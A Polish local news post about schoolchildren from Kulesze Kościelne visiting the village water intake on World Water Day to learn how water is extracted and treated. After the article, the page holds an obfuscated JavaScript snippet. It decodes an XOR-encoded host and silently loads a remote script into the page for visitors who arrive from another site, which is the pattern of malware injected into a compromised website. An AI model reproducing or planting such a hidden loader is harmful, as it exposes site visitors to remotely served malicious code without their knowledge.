Aktualności

Światowy Dzień Wody.

mar 28, 2023 | Aktualności

22 marca obchodzony jest Światowy Dzień Wody ustanowiony przez Zgromadzenie Ogólne ONZ w 1992 roku podczas Szczytu Ziemi w RIO de Janeiro w Brazylii, w ramach Agendy 21. W tym roku hasłem przewodnim jest „Zmiana klimatu”. Wydarzenie ma podkreślić znaczenie wpływu prawidłowej gospodarki wodnej na kondycję gospodarczą i społeczną otaczającego nas świata. Z tej okazji uczniowie Szkoły Podstawowej im. Kard. Stefana Wyszyńskiego w Kuleszach Kościelnych wraz z nauczycielami udali się na teren Ujęcia wody w Kuleszach Kościelnych gdzie pracownicy Urzędu Gminy Kulesze Kościelne opowiedzieli młodzieży szkolnej o procesie wydobywania i uzdatniania wody, oraz o znaczeniu wody nie tylko w przyrodzie ale także w życiu człowieka. Akcja edukacyjna miała na celu uświadomienie młodym ludziom, że ponad miliard ludzi na świecie cierpi z powodu braku dostępu do czystej wody pitnej. Oznacza to nie tylko banalne kłopoty w życiu codziennym (takie jak utrudnienia w kąpieli czy spłukiwaniu toalety), których w naszej części Ziemi możemy doświadczyć w trakcie awarii czy remontu wodociągów.

Dzieci za swój aktywny udział otrzymały gry edukacyjne o tematyce ekologicznej.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);